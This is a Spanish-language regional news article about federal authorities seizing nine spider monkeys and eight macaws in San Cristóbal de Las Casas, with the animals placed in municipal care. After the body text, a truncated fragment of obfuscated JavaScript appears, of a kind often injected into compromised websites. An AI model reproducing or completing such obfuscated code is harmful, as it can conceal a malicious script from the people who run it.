Aseguran ejemplares de fauna silvestre en San Cristóbal; quedan bajo resguardo municipal

YolandaRodríguez/ corresponsal
30 de julio del 2025. San Cristóbal de Las Casas.– Un operativo realizado por la Fiscalía General de la República (FGR) permitió la detención de un hombre que transportaba de forma ilegal nueve monos araña y ocho guacamayas, especies protegidas por las leyes ambientales. La detención se llevó a cabo en esta ciudad como parte de las acciones para combatir el tráfico ilegal de vida silvestre.

Las autoridades federales solicitaron apoyo al gobierno municipal para el resguardo temporal de los ejemplares, por lo que personal especializado habilitó un espacio seguro donde se brindan cuidados veterinarios, alimentación y vigilancia constante. Los animales permanecerán bajo resguardo local hasta que la Procuraduría Federal de Protección al Ambiente (PROFEPA) determine su traslado a una Unidad de Manejo Ambiental (UMA) autorizada.

El gobierno municipal reiteró su compromiso con la conservación de la biodiversidad y la protección de especies en riesgo, al colaborar activamente en la atención y cuidado de los ejemplares asegurados.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Un auto destrozado para frenar la imprudencia en la carretera de cuota

YolandaRodríguez/ corresponsal San Cristóbal de Las Casas, 02 de enero de 2026.– Un vehículo siniestrado …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *